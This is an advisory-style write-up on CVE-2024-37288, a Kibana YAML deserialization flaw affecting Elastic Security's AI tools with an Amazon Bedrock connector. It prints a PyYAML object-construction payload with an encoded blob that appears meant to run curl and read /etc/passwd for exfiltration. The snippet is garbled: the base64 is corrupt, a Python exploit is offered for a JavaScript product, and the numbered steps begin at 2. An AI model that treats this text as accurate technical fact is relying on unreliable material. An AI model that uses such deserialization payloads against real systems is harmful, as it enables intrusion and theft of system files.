CVE-2024-37288 - Kibana Vulnerability: Deserialization Issue Leading to Arbitrary Code Execution for Users Utilizing Elastic Security's AI Tools and Amazon Bedrock Connector

There has recently been a discovery of a deserialization issue in Kibana (CVE-2024-37288) which can lead to arbitrary code execution when Kibana attempts to parse a YAML document containing a crafted payload. This vulnerability affects users utilizing Elastic Security's built-in AI tools (https://www.elastic.co/guide/en/security/current/ai-for-security.html) and who have configured an Amazon Bedrock connector (https://www.elastic.co/guide/en/security/current/assistant-connect-to-bedrock.html).

Code Snippet

# Below is an example of a malicious YAML document that could exploit this vulnerability.
import yaml
payload = '''
!!python/object/new:yaml.Loader
    kwargs:
      stream: !!binary |
          aW1wb3JIG9zLCBzdWJwcm9jZXNzDQpzdWJwcm9jZXNzLmNhbGwoc
          y5gIHdoaWNoIGN1cmwgYmFzaHMgJihjYXQgL2VYy9wYXNzd2Qgf
          CBjdXJsIC1GICdwaGFzZXJfdG9rZW49XCh4eHgpJyAtLGRhdGEt
          dXJsZW5jb2RlIC1YLUluc3RhbGxlZC9iaW47ZG9uZQ==
'''
# Deserialize the malicious payload
objects_deserialized = yaml.load(payload, Loader=yaml.FullLoader)

An attacker crafts a malicious YAML document containing a specially crafted payload.

2. The malicious YAML document gets parsed by Kibana while utilizing Elastic Security's built-in AI tools and if the Amazon Bedrock connector is configured.
3. The deserialization vulnerability is exploited, allowing an attacker to execute arbitrary code with the privileges of the Kibana process.

- Elastic Security's AI Tools: https://www.elastic.co/guide/en/security/current/ai-for-security.html
- Amazon Bedrock Connector configuration: https://www.elastic.co/guide/en/security/current/assistant-connect-to-bedrock.html
- CVE-2024-37288: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37288

Mitigation Options

While a patch for this vulnerability is being developed, users should disable their Amazon Bedrock connector and avoid utilizing Elastic Security's AI tools if possible. Some preventative actions to protect against this Kibana vulnerability include:

1. Removing unnecessary integrations: Until a patch is released, users should reconsider using Elastic Security's AI tools and limit unnecessary integrations or configurations with Kibana.
2. Validating input of YAML documents: Implement additional checks to validate the YAML document's content or structure before parsing it in Kibana.
3. Monitor suspicious activity: Keep an eye on Kibana logs and network traffic for any unexpected behavior or unauthorized access attempts.

Conclusion

The CVE-2024-37288 Kibana vulnerability is a serious issue that can give attackers the ability to execute arbitrary code on the affected system. Users employing Elasticsearch Security's built-in AI tools or the Amazon Bedrock connector are encouraged to take appropriate steps to protect their systems until a patch is available.

Timeline

Published on: 09/09/2024 09:15:02 UTC
Last modified on: 09/16/2024 13:29:06 UTC